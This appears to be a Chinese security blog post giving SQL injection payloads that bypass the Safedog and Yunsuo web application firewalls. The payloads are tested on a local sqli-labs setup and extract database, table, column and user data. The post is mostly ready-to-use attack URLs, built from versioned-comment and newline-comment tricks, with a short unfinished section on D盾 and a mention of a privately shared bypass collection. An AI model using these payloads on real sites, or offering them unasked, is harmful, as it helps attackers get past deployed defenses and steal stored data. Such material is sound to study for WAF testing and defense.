我的waf bypass之道

前言

可能会持续更新，也许吧谁知道呢

emmmm,
  直发payload好了，反正过程又没什么好说的。（主要是没有什么技术含量
  环境：
  安全狗：4.0（apache官网最新版）/云锁：反正就是官网最新下载的/D盾：同新
  Mysql: 5.7.26
  php: phpstudy8.0（php5.6）
  *注：* 安全狗开启了"非法访问information_schema数据库"项，最新版默认不开启，但是窝给开启了！（不开启该项还是挺好绕的，逃

锤狗篇

就，绕嘛。

获取数据库名：
http://localhost/sqli-labs/Less-1/?id=-1%27%20union%20all--+x%0Aselect%201,2,database/*!00000()*/--+

获取表名：
http://localhost/sqli-labs/Less-1/?id=-1%27%20union%20all--+x%0Aselect%201,2,group_concat(table_name)from%20sys.schema_auto_increment_columns%20where%20table_schema=database/*!/*%23*/*/()--+

获取字段名：
http://localhost/sqli-labs/Less-1/?id=-1%27union%20all--+x%0Aselect%20*%20from%20(select%20*%20from--+a%0Ausers%20as%20a%20join%20users%20b)c--+
&&
http://localhost/sqli-labs/Less-1/?id=-1%27union%20all--+x%0Aselect%20*%20from%20(select%20*%20from--+a%0Ausers%20as%20a%20join%20users%20b%20using(id))c--+

获取数据：
http://localhost/sqli-labs/Less-1/?id=-1%27union%20all--+x%0Aselect%201,2,group_concat(username)--+x%0Afrom%20users--+

效果，就那样吧

开锁篇

和安全狗的规则差别还是挺大的

获取字段数：
http://localhost/sqli-labs/Less-1/?id=1%27%20order/*!00000by*/3--+

获取数据库名：
http://localhost/sqli-labs/Less-1/?id=-1%27%20union%20/*!00000all%20select*/%201,2,database/**/()--+

获取表名（搞了个牛逼的payload，其实就是很简洁，但是私藏了~）：
http://localhost/sqli-labs/Less-1/?id=-1%27union/*!00000all*//*!00000select+1,2,group_concat(table_name)*/from%20information_schema.tables%20where%20table_schema=database()--+

获取字段名：
http://localhost/sqli-labs/Less-1/?id=-1%27union/*!00000all*//*!00000select%201,2,group_concat(column_name)from%20information_schema.columns%20where%20table_name=%27users%27*/--+

获取数据：
http://localhost/sqli-labs/Less-1/?id=-1%27%20union/*!00000all*//*!00000select%201,2,group_concat(username)*/from%20users--+

看图

破盾篇

配了个iis服务器配了好久，老子不搞了，等找到集成环境 or 哪天心情好配置好了环境再更吧。推荐一下chabug的@level师傅的文章。

我level表哥的破盾大法

最终

总结了一些过waf的payload，搞了个合集，相信各位大表哥也都会，想了想扔chabug核心群里了。没啥技术含量，留着waf更新后用吧，省着再浪费时间去搞。

文章更新的速度真低，我的初衷不是这样的啊（逃。